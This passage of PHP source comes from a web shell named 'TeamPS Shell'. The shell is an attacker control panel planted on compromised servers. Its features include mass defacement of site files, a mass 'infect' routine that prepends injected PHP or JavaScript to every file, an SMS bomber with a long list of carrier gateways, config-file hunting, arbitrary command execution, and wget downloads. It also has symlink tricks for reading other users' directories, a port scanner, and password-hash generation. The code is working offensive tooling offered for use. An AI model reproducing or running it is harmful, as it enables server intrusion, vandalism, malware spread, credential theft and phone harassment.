752 echo "<font color='red'><b>Failed to deface file: $file2</b></font><br>";
753 $failed++;
754 }
755 }
756 }
757 echo "<font color='#14ab00'><b>$success files successfully defaced!<br>Failed to deface $failed files!</b></font><br>";
758 }
759}
760if (isset($_GET['massdeface'])) {
761 echo "<center>
762<font color='#14ab00'>
763<form action='' method='post'>
764Directory to start deface from:<br>
765<select name='deface_dir'>
766<option value='root'>Root</option>
767<option value='custom'>Custom</option>
768</select><br>
769Custom Directory: <input class='text' type='text' name='custom_dir' size='40'><br>
770Source of deface:<br>
771<textarea rows='20' cols='150' name='massdeface_source' style='color:#000'>
772</textarea><br>
773This will not deface this shell.<br>
774<input type='submit' name='do_mass_deface' value='Deface'><br>
775</form>
776</font>
777</center>";
778}
779//Mass file infect
780if (isset($_POST['do_mass_infect'])) {
781 $masscode = " " . $_POST['massinfect_code'] . "
782";
783 $inf_dir = $_POST['infect_dir'];
784 $infcustom_dir = $_POST['cinfect_dir'];
785 $infcustom_dir = rtrim($infcustom_dir, "/");
786 $failed = 0;
787 $success = 0;
788 if (empty($masscode)) {
789 error("You must enter a code to infect files with!");
790 } elseif (empty($infcustom_dir) && $inf_dir == "custom") {
791 error("You must enter a custom directory when using the Custom option!");
792 } else {
793 if ($inf_dir == "root") {
794 $mddir = $rootdir;
795 }
796 if ($inf_dir == "custom") {
797 $mddir = $infcustom_dir;
798 }
799 foreach (files($mddir) as $key => $file) {
800 $file2 = trim($file, ".");
801 $getinf_file = file_get_contents($file2);
802 if ("$file2" == "$dir/$script2") {
803 echo "";
804 } else {
805 if (file_put_contents("$file2", $masscode) && file_put_contents("$file2", $getinf_file, FILE_APPEND)) {
806 echo "<font color='green'><b>Successfully infected file: $file2</b></font><br>";
807 $success++;
808 } else {
809 echo "<font color='red'><b>Failed to infect file: $file2</b></font><br>";
810 $failed++;
811 }
812 }
813 }
814 echo "<font color='#14ab00'><b>$success files successfully infected!<br>Failed to infect $failed files!</b></font><br>";
815 }
816}
817if (isset($_GET['massinfect'])) {
818 $example = "<?php system() ?>";
819 $example = htmlspecialchars($example);
820 $example2 = "<script>alert()</script>";
821 $example2 = htmlspecialchars($example2);
822 echo "<center>
823<font color='#14ab00'>
824<form action='' method='post'>
825Directory to start infect from:<br>
826<select name='infect_dir'>
827<option value='root'>Root</option>
828<option value='custom'>Custom</option>
829</select><br>
830Custom Directory: <input class='text' type='text' name='cinfect_dir' size='40'><br>
831This is great for infecting mass files with javascript scripts or php scripts<br>
832It will append the code to the top of each file.<br>
833Example:<br>
834$example<br>
835$example2<br>
836Infect code:<br>
837<textarea rows='20' cols='150' name='massinfect_code' style='color:#000'>
838</textarea><br>
839This will not infect this shell.<br>
840<input type='submit' name='do_mass_infect' value='Infect'><br>
841</form>
842</font>
843</center>";
844}
845//SMS Bomber stuff
846if (isset($_POST['do_bomb_sms'])) {
847 $phonenum = $_POST['phnumber'];
848 $carrier = $_POST['carrier'];
849 $amount = $_POST['numberof'];
850 $from = $_POST['from'];
851 $headers = "From: $from
852";
853 $headers.= 'MIME-Version: 1.0' . "
854";
855 $headers.= 'Content-type: text/html; charset=iso-8859-1' . "
856";
857 $subject = $_POST['subject'];
858 $to = "$phonenum$carrier";
859 $numsent = 0;
860 $sent_fail = 0;
861 $sent_success = 0;
862 $msgcontent = $_POST['message_content'];
863 if (empty($phonenum) OR empty($amount) OR empty($from) OR empty($subject) OR empty($msgcontent)) {
864 error("All Fields Must Entered!");
865 } else {
866 while ($numsent < $amount) {
867 if (!@mail($to, $subject, $msgcontent, $headers)) {
868 $numsent++;
869 $sent_fail++;
870 } else {
871 $numsent++;
872 $sent_success++;
873 }
874 }
875 echo "<font color='#14ab00'>Successfully sent $sent_success messages.<br>
876Failed to send $sent_fail messages.<br>";
877 }
878}
879if (isset($_GET['sms'])) {
880 echo "<font color='#14ab00'>
881<table class='noborder'>
882<tr>
883<form action='' method='post'>
884<td>Phone Number With Area Code</td>
885<td><input type='text' name='phnumber' class='text'></td>
886</tr>
887<tr>
888<td>Carrier:</td>
889<td>
890<select name='carrier'>
891<option value='@sms.3rivers.net'>3 River Wireless</option>
892<option value='@paging.acswireless.com'>ACS Wireless</option>
893<option value='@advantagepaging.com'>Advantage Communications</option>
894<option value='@airtelkk.com'>Airtel (Karnataka, India)</option>
895<option value='@sms.airtelmontana.com'>Airtel Wireless (Montana, USA)</option>
896<option value='@airtouch.net'>Airtouch Pagers</option>
897<option value='@airtouchpaging.com'>Airtouch Pagers</option>
898<option value='@alphapage.airtouch.com'>Airtouch Pagers</option>
899<option value='@myairmail.com'>Airtouch Pagers</option>
900<option value='@msg.acsalaska.com'>Alaska Communications Systems</option>
901<option value='@message.alltel.com'>Alltel</option>
902<option value='@alphanow.net'>AlphaNow</option>
903<option value='@page.americanmessaging.net'>American Messaging</option>
904<option value='@clearpath.acswireless.com'>Ameritech Clearpath</option>
905<option value='@paging.acswireless.com'>Ameritech Paging</option>
906<option value='@pageapi.com'>Ameritech Paging</option>
907<option value='@airtelap.com'>Andhra Pradesh Airtel</option>
908<option value='@text.aql.com'>Aql</option>
909<option value='@archwireless.net'>Arch Pagers (PageNet)</option>
910<option value='@epage.arch.com'>Arch Pagers (PageNet)</option>
911<option value='@mobile.att.net'>AT&T</option>
912<option value='@txt.att.net'>AT&T2</option>
913<option value='@page.att.net'>AT&T Enterprise Paging</option>
914<option value='@mmode.com'>AT&T Free2Go</option>
915<option value='@mobile.att.net'>AT&T PCS</option>
916<option value='@dpcs.mobile.att.net'>AT&T Pocketnet PCS</option>
917<option value='@sms.beemail.ru'>BeeLine GSM</option>
918<option value='@beepwear.net'>Beepwear</option>
919<option value='@message.bam.com'>Bell Atlantic</option>
920<option value='@bellmobility.ca'>Bell Canada</option>
921<option value='@txt.bellmobility.ca'>Bell Canada2</option>
922<option value='@txt.bell.ca'>Bell Mobility (Canada)</option>
923<option value='@bellsouth.cl'>Bell South</option>
924<option value='@blsdcs.net'>Bell South2</option>
925<option value='@sms.bellsouth.com'>Bell South3</option>
926<option value='@wireless.bellsouth.com'>Bell South4</option>
927<option value='@bellsouthtips.com'>Bell South (Blackberry)</option>
928<option value='@blsdcs.net'>Bell South Mobility</option>
929<option value='@tachyonsms.co.uk'>BigRedGiant Mobile Solutions</option>
930<option value='@blueskyfrog.com'>Blue Sky Frog</option>
931<option value='@sms.bluecell.com'>Bluegrass Cellular</option>
932<option value='@myboostmobile.com'>Boost</option>
933<option value='@bplmobile.com'>BPL Mobile</option>
934<option value='@@bplmobile.com'>BPL Mobile (Mumbai, India)</option>
935<option value='@cmcpaging.com'>Carolina Mobile</option>
936<option value='@cwwsms.com'>Carolina West Wireless</option>
937<option value='@cell1.textmsg.com'>Cellular One</option>
938<option value='@cellularone.textmsg.com'>Cellular One2</option>
939<option value='@message.cellone-sf.com'>Cellular One3</option>
940<option value='@mobile.celloneusa.com'>Cellular One4</option>
941<option value='@sbcemail.com'>Cellular One5</option>
942<option value='@phone.cellone.net'>Cellular One (East Coast)</option>
943<option value='@swmsg.com'>Cellular One (South West)</option>
944<option value='@mycellone.com'>Cellular One (West)</option>
945<option value='@paging.cellone-sf.com'>Cellular One PCS</option>
946<option value='@csouth1.com'>Cellular South</option>
947<option value='@cwemail.com'>Centennial Wireless</option>
948<option value='@cvcpaging.com'>Central Vermont</option>
949<option value='@messaging.centurytel.net'>CenturyTel</option>
950<option value='@rpgmail.net'>Chennai RPG Cellular</option>
951<option value='@airtelchennai.com'>Chennai Skycell / Airtel</option>
952<option value='@gocbw.com'>Cincinnati Bell</option>
953<option value='@cingularme.com'>Cingular</option>
954<option value='@mms.cingularme.com'>Cingular2</option>
955<option value='@mycingular.com'>Cingular3</option>
956<option value='@page.cingular.com'>Cingular5</option>
957<option value='@txt.att.net'>Cingular (Now AT&T)</option>
958<option value='@clarotorpedo.com.br'>Claro (Brasil)</option>
959<option value='@ideasclaro-ca.com'>Claro (Nicaragua)</option>
960<option value='@msg.clearnet.com'>Clearnet</option>
961<option value='@comcastpcs.textmsg.com'>Comcast</option>
962<option value='@comcel.com.co'>Comcel</option>
963<option value='@sms.comviq.se'>Comviq</option>
964<option value='@cookmail.com'>Cook Paging</option>
965<option value='@corrwireless.net'>Corr Wireless Communications</option>
966<option value='@sms.mycricket.com'>Cricket</option>
967<option value='@sms.ctimovil.com.ar'>CTI</option>
968<option value='@airtelmail.com'>Delhi Aritel</option>
969<option value='@delhi.hutch.co.in'>Delhi Hutch</option>
970<option value='@page.hit.net'>Digi-Page / Page Kansas</option>
971<option value='@mobile.dobson.net'>Dobson</option>
972<option value='@sms.orange.nl'>Dutchtone / Orange-NL</option>
973<option value='@sms.edgewireless.com'>Edge Wireless</option>
974<option value='@sms.emt.ee'>EMT</option>
975<option value='@emtelworld.net'>Emtel (Mauritius)</option>
976<option value='@escotelmobile.com'>Escotel</option>
977<option value='@fido.ca'>Fido</option>
978<option value='@epage.gabrielwireless.com'>Gabriel Wireless</option>
979<option value='@sendabeep.net'>Galaxy Corporation</option>
980<option value='@webpager.us'>GCS Paging</option>
981<option value='@msg.gci.net'>General Communications Inc.</option>
982<option value='@t-mobile-sms.de'>German T-Mobile</option>
983<option value='@msg.globalstarusa.com'>Globalstar (satellite)</option>
984<option value='@bplmobile.com'>Goa BPLMobil</option>
985<option value='@sms.goldentele.com'>Golden Telecom</option>
986<option value='@epage.porta-phone.com'>GrayLink / Porta-Phone</option>
987<option value='@celforce.com'>Gujarat Celforce</option>
988<option value='@messaging.sprintpcs.com'>Helio</option>
989<option value='@text.houstoncellular.net'>Houston Cellular</option>
990<option value='@ideacellular.net'>Idea Cellular</option>
991<option value='@ivctext.com'>Illinois Valley Cellular</option>
992<option value='@page.infopagesystems.com'>Infopage Systems</option>
993<option value='@inlandlink.com'>Inland Cellular Telephone</option>
994<option value='@msg.iridium.com'>Iridium (satellite)</option>
995<option value='@rek2.com.mx'>Iusacell</option>
996<option value='@jsmtel.com'>JSM Tele-Page</option>
997<option value='@msg.koodomobile.com'>Koodo Mobile (Canada)</option>
998<option value='@mci.com'>MCI Phone</option>
999<option value='@sms.mymeteor.ie'>Meteor</option>
1000<option value='@metropcs.sms.us'>Metro PCS</option>
1001<option value='@clearlydigital.com'>Midwest Wireless</option>
1002<option value='@mobilecomm.net'>Mobilcomm</option>
1003<option value='@text.mtsmobility.com'>MTS</option>
1004<option value='@sms.netcom.no'>Netcom</option>
1005<option value='@messaging.nextel.com'>Nextel</option>
1006<option value='@o2.co.uk'>O2</option>
1007<option value='@o2imail.co.uk'>O2#2</option>
1008<option value='@mmail.co.uk'>O2 (M-mail)</option>
1009<option value='@orange.net'>Orange</option>
1010<option value='@qwestmp.com'>Qwest</option>
1011<option value='@pcs.rogers.com'>Rogers</option>
1012<option value='@sms.sasktel.com'>Sasktel (Canada)</option>
1013<option value='@mysmart.mymobile.ph'>Smart Telecom</option>
1014<option value='@messaging.sprintpcs.com'>Sprint</option>
1015<option value='@tms.suncom.com'>Sumcom</option>
1016<option value='@tmomail.net'>T-Mobile</option>
1017<option value='@t-mobile.uk.net'>T-Mobile (UK)</option>
1018<option value='@t-d1-sms.de'>T-Mobile Germany</option>
1019<option value='@txt.att.net'>Tracfone</option>
1020<option value='@mmst5.tracfone.com'>Tracfone (prepaid)</option>
1021<option value='@vtext.com'>Verizon</option>
1022<option value='@vmobl.com'>Virgin Mobile</option>
1023<option value='@vmobile.ca'>Virgin Mobile (Canada)</option>
1024<option value='@vodafone.net'>Vodafone UK</option>
1025</select>
1026</td>
1027</tr>
1028<tr>
1029<td>Amount Of Messages To Send:</td>
1030<td><input type='text' name='numberof' size='10' class='text'></td>
1031</tr>
1032<tr>
1033<td>From:</td>
1034<td><input type='text' name='from' class='text'></td>
1035</tr>
1036<tr>
1037<td>Subject:</td>
1038<td><input type='text' size='85' class='text' name='subject'></td>
1039</tr>
1040</table>
1041Message Content:<br>
1042<textarea rows='20' cols='150' name='message_content' style='color:#000000'>
1043</textarea><br>
1044<input type='submit' name='do_bomb_sms' value='Bomb'><br>
1045</form><br></font><br>";
1046}
1047//Config finder
1048if (isset($_GET['config'])) {
1049 $configs_found = 0;
1050 foreach (files($rootdir) as $key => $cfile) {
1051 $file2 = trim($cfile, ".");
1052 $cex = explode("/", $file2);
1053 $cex2 = end($cex);
1054 if (preg_match('/config/', $cex2)) {
1055 echo "<a class='navbar' href='http://$domain$script?editfile=$file2'>$file2</a><br>";
1056 $configs_found++;
1057 }
1058 }
1059 if ($configs_found == "0") {
1060 error("No configuration files found!");
1061 } else {
1062 echo "<font color='#14ab00'>$configs_found Configuration files found!</font><br><br>";
1063 success("configs_found", $configs_found);
1064 }
1065}
1066//Search
1067if (isset($_GET['search'])) {
1068 echo "<center><font color='#14ab00' size='3'>
1069<form action='' method='post'>
1070Directory to search in:<br>
1071<input type='text' name='search_dir' class='text' size='50' value='$dir'><br>
1072Value to search for:<br>
1073<input type='text' name='search_value' class='text'><br>
1074<input type='submit' name='do_search' value='Search'>
1075</form>
1076</font>
1077</center>";
1078}
1079if (isset($_POST['do_search'])) {
1080 $searchdir = $_POST['search_dir'];
1081 $searchval = $_POST['search_value'];
1082 $matches = 0;
1083 foreach (files($searchdir) as $key => $cfile) {
1084 $file2 = trim($cfile, ".");
1085 $cex = explode("/", $file2);
1086 $cex2 = end($cex);
1087 if (preg_match('/' . $searchval . '/', $cex2)) {
1088 echo "<a class='navbar' href='http://$domain$script?editfile=$file2'>$file2</a><br>";
1089 $matches++;
1090 }
1091 }
1092 if ($matches == 0) {
1093 error("No files that match $searchval");
1094 } else {
1095 echo "<font color='#14ab00' size='3'>$matches files found that match $searchval</font><br>";
1096 success("files_found", $matches);
1097 }
1098}
1099//Unzip
1100if (isset($_GET['unzipfile'])) {
1101 $unzipfile = $_GET['unzipfile'];
1102 $redir = dirname($unzipfile);
1103 unzip($unzipfile, rtrim($redir, '/'));
1104}
1105//Exectue Command
1106if (isset($_POST['do_exe_command'])) {
1107 $ecmd = $_POST['exe_command'];
1108 $exe_cmd = cmd2($ecmd, $dir);
1109 echo "<center><font color='#14ab00'>
1110<form action='' method='post'>
1111<input type='text' class='text' name='exe_command' size='60'>
1112<input type='submit' name='do_exe_command' value='Execute'><br>
1113</form>
1114Result:<br>
1115<textarea rows='20' cols='150' name='massdeface_source' style='color:#000'>
1116$exe_cmd
1117</textarea></font></center><br><br>";
1118}
1119//wget file
1120if (isset($_POST['do_wget_file'])) {
1121 $wget_file = $_POST['wget_file'];
1122 $wecmd = "wget $wget_file";
1123 $wget_ecmd = cmd2($wecmd, $dir);
1124 echo "<center><font color='#14ab00'>
1125Result:<br>
1126<textarea rows='20' cols='150' name='massdeface_source' style='color:#000'>
1127$wget_ecmd
1128</textarea></font></center><br><br>";
1129}
1130//Domain information
1131//Get domains hosted on server from yougetsignal.com
1132if (isset($_GET['domaininfo'])) {
1133 echo "<font color='#14ab00' size='3'>";
1134 $dns_record = dns_get_record($domain, DNS_ANY, $authns, $addtl);
1135 $num = 0;
1136 $count = sizeof($dns_record);
1137 echo "<br>Name Servers:</b><br>";
1138 while ($num < $count) {
1139 $name_servers = $dns_record[$num];
1140 $name_servers2 = $name_servers['type'];
1141 $name_servers3 = @$name_servers['target'];
1142 $num++;
1143 if ($name_servers2 == "NS") {
1144 echo "$name_servers3<br>";
1145 $nshost = @$name_servers['host'];
1146 }
1147 if ($name_servers2 == "SOA") {
1148 $nsemail = $name_servers['rname'];
1149 }
1150 if ($name_servers2 == "A") {
1151 $nsip = $name_servers['ip'];
1152 }
1153 }
1154 $num = 0;
1155 echo "<br><table class='noborder'>
1156<tr>
1157<td><b>Host:</b></td>
1158<td>$nshost</td>
1159</tr>
1160<tr>
1161<td><b>IP:</b></td>
1162<td>$nsip</td>
1163</tr>
1164<tr>
1165<td><b>Email:</b></td>
1166<td>$nsemail</td>
1167</tr>
1168</table><br>";
1169 $domains_on_server = json_decode(file_get_contents("http://www.yougetsignal.com/tools/web-sites-on-web-server/php/testing.php?remoteAddress=$domain"));
1170 $status = $domains_on_server->status;
1171 $message = $domains_on_server->message;
1172 $domainAr = $domains_on_server->domainArray;
1173 $num_of_site = $domains_on_server->domainCount;
1174 $count = sizeof($domainAr);
1175 if ($status == "Success") {
1176 echo "Found $num_of_site sites hosted on the same server as $nshost($nsip) via <a class='navbar' href='http://www.yougetsignal.com/tools/web-sites-on-web-server/'>www.yougetsignal.com</a>:<br><br> <table class='noborder'>";
1177 while ($num < $count) {
1178 $hossites = $domainAr[$num];
1179 $num++;
1180 $hossites3 = $domainAr[$num];
1181 $hossites3 = $hossites3[0];
1182 $hossites = $hossites[0];
1183 $site_ips = empty($hossites) ? "" : "(" . gethostbyname($hossites) . ")";
1184 $site_ips2 = empty($hossites3) ? "" : "(" . gethostbyname($hossites3) . ")";
1185 echo "<tr><td><a class='navbar' href='http://$hossites'>$hossites</a> $site_ips</td><td><a class='navbar' href='http://$hossites3'>$hossites3</a> $site_ips2</td></tr>";
1186 $num++;
1187 }
1188 echo "</table><br>";
1189 $num = 0;
1190 } else {
1191 error("Failed to find or get sites hosted on same server from: <a class='navbar' href='http://www.yougetsignal.com/tools/web-sites-on-web-server/'>www.yougetsignal.com</a>!<br>Additional Message:<br>$message");
1192 }
1193 echo "</font><br>";
1194}
1195//Encrypt string
1196if (isset($_GET['encrypt'])) {
1197 echo "<form action='' method='post'>
1198<center><font color='#14ab00'>
1199<input type='text' name='en_string' class='text'>
1200<input type='submit' name='do_encrypt' value='Encrypt String'>
1201</form>
1202</font></center>";
1203}
1204if (isset($_POST['do_encrypt'])) {
1205 $vbsalt = gen_salt("30");
1206 $vbsalt2 = gen_salt("3");
1207 $mybbsalt = gen_salt("8");
1208 $ipbsalt = gen_salt("5");
1209 $joomlasalt = gen_salt("32");
1210 $password = $_POST['en_string'];
1211 $md5 = md5($password);
1212 $md52 = md5(md5($password));
1213 $md53 = md5(md5(md5($password)));
1214 $sha1 = sha1($password);
1215 $sha256 = hash('sha256', $password);
1216 $vbalg = md5(md5($password) . $vbsalt);
1217 $vbalg2 = md5(md5($password) . $vbsalt2);
1218 $mybbalg = md5(md5($mybbsalt) . $password);
1219 $ipbalg = md5(md5($ipbsalt) . md5($password));
1220 $joomlaalg = md5($password . $joomlasalt);
1221 $en_result = "Hashes for string: $password
1222MD5: $md5
1223md5(md5(pass)): $md52
1224md5(md5(md5(pass))): $md53
1225SHA-1: $sha1
1226SHA-256: $sha256
1227vBulletin 4: $vbalg:$vbsalt
1228vBulletin 3: $vbalg2:$vbsalt2
1229MyBB: $mybbalg:$mybbsalt
1230IPB: $ipbalg:$ipbsalt
1231Joomla 1.0.13+: $joomlaalg:$joomlasalt
1232";
1233 echo "<center>
1234<textarea rows='20' cols='150' style='color:#000'>
1235$en_result
1236</textarea>
1237</center><br>";
1238}
1239//Symlink Stuff
1240if (isset($_GET['symlink'])) {
1241 echo "<center><font color='#14ab00'>
1242<form action='' method='post'>
1243Directory To Symlink:<br>
1244<input type='text' name='sym_dir' class='text' size='40'>
1245<input type='submit' name='do_sym' value='Create Symlink'>
1246</form><br>";
1247 if (isset($_POST['do_sym'])) {
1248 $symdir = rtrim($_POST['sym_dir'], '/');
1249 $symdir3 = trim($_POST['sym_dir'], '/');
1250 $symdir2 = str_replace("/", "-", $symdir3);
1251 if (!is_dir("$dir/ssym")) {
1252 if (mkdir("$dir/ssym")) {
1253 $htaccess = "Options Indexes FollowSymLinks
1254DirectoryIndex sssss.htm
1255AddType txt .php
1256AddHandler txt .php";
1257 if (file_put_contents("$dir/ssym/.htaccess", $htaccess)) {
1258 } else {
1259 error("Failed to make .htaccess file!");
1260 }
1261 cmd2("ln -s $symdir/ $symdir2", "$dir/ssym");
1262 echo "<center><a class='navbar' href='./ssym/$symdir2'>$symdir/</a></center>";
1263 } else {
1264 error("Failed to make symlink directory");
1265 }
1266 } else {
1267 cmd2("ln -s $symdir/ $symdir2", "$dir/ssym");
1268 echo "<center><a class='navbar' href='./ssym/$symdir2'>$symdir</a></center><br>";
1269 }
1270 }
1271 $opensymdir = opendir("$dir/ssym");
1272 $symdirs = array();
1273 while ($symfile = readdir($opensymdir)) {
1274 if ($symfile != "." && $file != "..") {
1275 if (is_link("$dir/ssym/$symfile")) {
1276 array_push($symdirs, $symfile);
1277 } else {
1278 }
1279 }
1280 }
1281 if (empty($symdirs)) {
1282 error("No symlinks found!");
1283 } else {
1284 echo "<b>Symlink's Found!</b><br><table class='noborder'>
1285<tr>
1286<th>Link</th>
1287<th>Link</th>
1288</tr>";
1289 $numsym = count($symdirs);
1290 $num = 0;
1291 while ($num < $numsym) {
1292 $symmdir = $symdirs[$num];
1293 $num++;
1294 $symmdir2 = $symdirs[$num];
1295 $num++;
1296 $symd = readlink("$dir/ssym/$symmdir");
1297 $symd2 = readlink("$dir/ssym/$symmdir2");
1298 echo "<tr><td><a href='./ssym/$symmdir' class='navbar'>$symd</a></td><td><a href='./ssym/$symmdir2' class='navbar'>$symd2</a></td></tr>";
1299 }
1300 }
1301 echo "</table><br>
1302</font></center>";
1303}
1304//Port scan
1305if (isset($_GET['scan'])) {
1306 echo "<center><font color='#14ab00' size='3'>
1307Port Scan:<br>
1308<form action='' method='post'>
1309Host: <input type='text' name='scan_host' class='text' value='$domain'><br>
1310Start port: <input type='text' name='start_port' class='text' size='6'>
1311End port: <input type='text' name='end_port' class='text' size='7'><br>
1312<input type='submit' name='start_scan' value='Scan'>
1313</form>
1314</font>
1315</center>";
1316}
1317if (isset($_POST['start_scan'])) {
1318 $scanhost = $_POST['scan_host'];
1319 $startport = $_POST['start_port'];
1320 $endport = $_POST['end_port'];
1321 while ($startport <= $endport) {
1322 if (fsockopen($scanhost, $startport, $errno, $errstr, 3)) {
1323 echo "<font color='green' size='3'>Port $startport is open on $scanhost</font><br>";
1324 } else {
1325 echo "<font color='red' size='3'>Port $startport is not open on $scanhost</font><br>";
1326 }
1327 $startport++;
1328 }
1329}
1330//Don't put anything you don't want to be echo'd
1331//out between the misc system bar and misc file bar
1332//here!
1333//echo out misc file bar.
1334$wr = is_writeable($dir) ? "<font color='green'><b>[ Writeable ]</b></font>" : "<font color='red'><b>[ Non Writeable ]</b></font>";
1335echo "<table border='1' width='100%' frame='void'>
1336<tr>
1337<td>
1338<center>
1339Create directory:<br>
1340<form action='' method='post'>
1341<input type='text' class='textround' name='create_dir' value='$dir/newdir' size='50'>
1342<input type='submit' name='do_create_dir' value='Create'><br>
1343$wr
1344</form>
1345</center>
1346</td>
1347<td>
1348<center>
1349Create file:<br>
1350<form action='' method='post'>
1351<input type='text' class='textround' name='create_file' value='$dir/newfile.php' size='50'>
1352<input type='submit' name='do_create_file' value='Create'><br>
1353$wr
1354</form>
1355</center>
1356</td>
1357</tr>
1358<tr>
1359<td>
1360<center>
1361Go to directory:<br>
1362<form action='' method='post'>
1363<input type='text'class='textround' name='go_dir' value='/tmp' size='50'>
1364<input type='submit' name='do_go_dir' value='Go'><br>
1365</form>
1366</center>
1367</td>
1368<td>
1369<center>
1370Edit file:<br>
1371<form action='' method='post'>
1372<input type='text' class='textround' name='go_edit_file' value='$dir/index.php' size='50'>
1373<input type='submit' name='do_go_edit' value='Edit'><br>
1374</form>
1375</center>
1376</td>
1377</tr>
1378<tr>
1379<td>
1380<center>
1381<form action='' method='post' enctype='multipart/form-data'>
1382Upload to location:<br>
1383<input type='text' class='text' style='width: 300px' value='$dir/' name='upload_location'></br><input type='file' name='upload_file'>
1384<input type='submit' value='Upload' name='do_upload_file'><br>
1385$wr
1386</form>
1387</center>
1388</td>
1389<td>
1390<center>
1391<form action='' method='post'>
1392wget file:<br>
1393<input type='text' name='wget_file' class='text' size='50' value='http://'>
1394<input type='submit' name='do_wget_file' value='wget'>
1395</form>
1396</center>
1397</td>
1398</tr>
1399<table border='1' frame='void' width='100%'>
1400<tr>
1401<td>
1402<center>
1403<form action='' method='post'>
1404Execute Command:<br>
1405<input type='text' class='text' name='exe_command' size='60'>
1406<input type='submit' name='do_exe_command' value='Execute'><br>
1407</form>
1408</center>
1409</td>
1410</tr>
1411</table>
1412<br><br><br>";
1413//echo out files
1414echo "<table border='1' width='100%' frame='void'>
1415<tr>
1416<th>
1417Current Directory: ";
1418$ex = explode("/", $dir);
1419for ($p = 0;$p < count($ex);$p++) {
1420 @$linkpath.= $ex[$p] . '/';
1421 $linkpath2 = rtrim($linkpath, "/");
1422 echo "<a href=http://$domain$script?path=$linkpath2>$ex[$p]</a>/";
1423}
1424echo "</th>
1425</tr>
1426</table>
1427<div id='hover'>
1428<table border='1' width='100%'>
1429<form action='' method='post' id='checkboxall'>
1430<tr>
1431<th>Directory/File Name</th>
1432<th>Owner/Group</th>
1433<th>Permissions</th>
1434<th>Writeable</th>
1435<th>Size</th>
1436<th>Last Modified</th>
1437<th>Delete</th>
1438<th>Rename</th>
1439<th>Mass</th>
1440</tr>
1441";
1442foreach ($direcs as $d) {
1443 $downer = function_exists("posix_getpwuid") ? posix_getpwuid(fileowner("$dir/$d")) : fileowner("$dir/$d");
1444 $dgroup = function_exists("posix_getgrgid") ? posix_getgrgid(filegroup("$dir/$d")) : filegroup("$dir/$d");
1445 if (is_array($downer)) {
1446 $downer = $downer['name'];
1447 }
1448 if (is_array($dgroup)) {
1449 $dgroup = $dgroup['name'];
1450 }
1451 $dperms = substr(base_convert(fileperms("$dir/$d"), 10, 8), 2);
1452 $dwrite = is_writeable("$dir/$d") ? "<font color='green'><b>Writeable</b></font>" : "<font color='red'><b>Non Writeable</b></font>";
1453 $dsize = "Directory";
1454 $dtime = date("F d Y g:i:s", filemtime("$dir/$d"));
1455 echo "<tr>
1456<td><a href='http://$domain$script?path=$dir/$d'>$d</a></td>
1457<td style='text-align: center;'>$downer/$dgroup</td>
1458<td style='text-align: center;'>$dperms</td>
1459<td style='text-align: center;'>$dwrite</td>
1460<td style='text-align: center;'>$dsize</td>
1461<td style='text-align: center;'>$dtime</td>
1462<td style='text-align: center;'><a href='http://$domain$script?deldir=$dir/$d'>Delete</a></td>
1463<td style='text-align: center;'><a href='http://$domain$script?rendir=$dir&old=$d'>Rename</a></td>
1464<td style='text-align: center;'><input name='delbox[]' type='checkbox' id='delbox' value='$dir/$d'></td>
1465</tr>";
1466}
1467foreach ($files as $f) {
1468 $fowner = function_exists("posix_getpwuid") ? posix_getpwuid(fileowner("$dir/$f")) : fileowner("$dir/$f");
1469 $fgroup = function_exists("posix_getgrgid") ? posix_getgrgid(filegroup("$dir/$f")) : filegroup("$dir/$f");
1470 if (is_array($fowner)) {
1471 $fowner = $fowner['name'];
1472 }
1473 if (is_array($fgroup)) {
1474 $fgroup = $fgroup['name'];
1475 }
1476 $fperms = substr(base_convert(fileperms("$dir/$f"), 10, 8), 2);
1477 $fwrite = is_writeable("$dir/$f") ? "<font color='green'><b>Writeable</b></font>" : "<font color='red'><b>Non Writeable</b></font>";
1478 $fsize = ByteConversion(filesize("$dir/$f"));
1479 $ftime = date("F d Y g:i:s", filemtime("$dir/$f"));
1480 $zip_file = explode(".", $f);
1481 $zip_file2 = end($zip_file);
1482 echo "<tr>";
1483 if ($zip_file2 == "zip") {
1484 echo "<td><a href='http://$domain$script?unzipfile=$dir/$f'>$f</td>";
1485 } else {
1486 echo "<td><a href='http://$domain$script?editfile=$dir/$f'>$f</td>";
1487 }
1488 echo "<td style='text-align: center;'>$fowner/$fgroup</td>
1489<td style='text-align: center;'>$fperms</td>
1490<td style='text-align: center;'>$fwrite</td>
1491<td style='text-align: center;'>$fsize</td>
1492<td style='text-align: center;'>$ftime</td>
1493<td style='text-align: center;'><a href='http://$domain$script?delfile=$dir/$f'>Delete</a></td>
1494<td style='text-align: center;'><a href='http://$domain$script?renfile=$dir&old=$f'>Rename</a></td>
1495<td style='text-align: center;'><input name='delbox[]' type='checkbox' id='delbox' value='$dir/$f'></td>
1496</tr>";
1497}
1498echo "</table></div>";
1499echo "<div id='bottom'><font color='#14ab00'>With all selected:</font><br>
1500<input type='button' onclick='checkall();' value='Select/Unselect All'>
1501<select name='mass_action'>
1502<option value='Delete'>Delete</option>
1503<option value='chmod'>chmod</option>
1504</select>
1505<input type='text' name='chmod_value' class='text' value='chmod value' size='9' id='ch' onfocus='removeValue()'>
1506<input type='submit' name='mass_files'><br></div>";
1507echo "</form>";
1508closedir();
1509?>
1510<title>TeamPS Shell</title>
1511<!-- CSS Start !-->
1512<style type="text/css">
1513 a:link {color: #FFFFFF; text-decoration: none; }
1514 a:active {color: #FFFFFF; text-decoration: none; }
1515 a:visited {color: #FFFFFF; text-decoration: none; }
1516 a:hover {color: #000000; text-decoration: none; }
1517 a.navbar:link {color: #FFFFFF; text-decoration: none; }
1518 a.navbar:visited {color: #FFFFFF; text-decoration: none; }
1519 a.navbar:active {color: #FFFFFF; text-decoration: none; }
1520 a.navbar:hover {color: #303030; text-decoration: none; }
1521 body {
1522 background: #121212 url(http://www.p0wersurge.com/forums/images/pscustom/new/ps5skin-min.png) center top repeat-x;
1523 font-family: consolas;
1524 font-weight: bold;
1525 font-size: 12px;
1526 color:#000000;
1527 }
1528 table
1529 {
1530 border-width: 2px;
1531 border-spacing: 2px;
1532 border-style: solid;
1533 border-color: #14ab00;
1534 background-color: #303030;
1535 }
1536 #hover tr:hover{
1537 background-color: #14ab00;
1538 }
1539 .noborder, .noborder tr, .noborder th, .noborder td { border: none; background-color: transparent; color: #14ab00;}
1540 table.th {
1541 padding: 1px;
1542 border-color: #303030;
1543 background-color: #303030;
1544 }
1545 table.td {
1546 padding: 1px;
1547 border-color: #303030;
1548 background-color: #303030;
1549 }
1550 textarea {
1551 border: 3px solid #14ab00;
1552 padding: 3px;
1553 background-color: #303030;
1554 outline-color:#14ab00;
1555 resize: none;
1556 }
1557 .text {
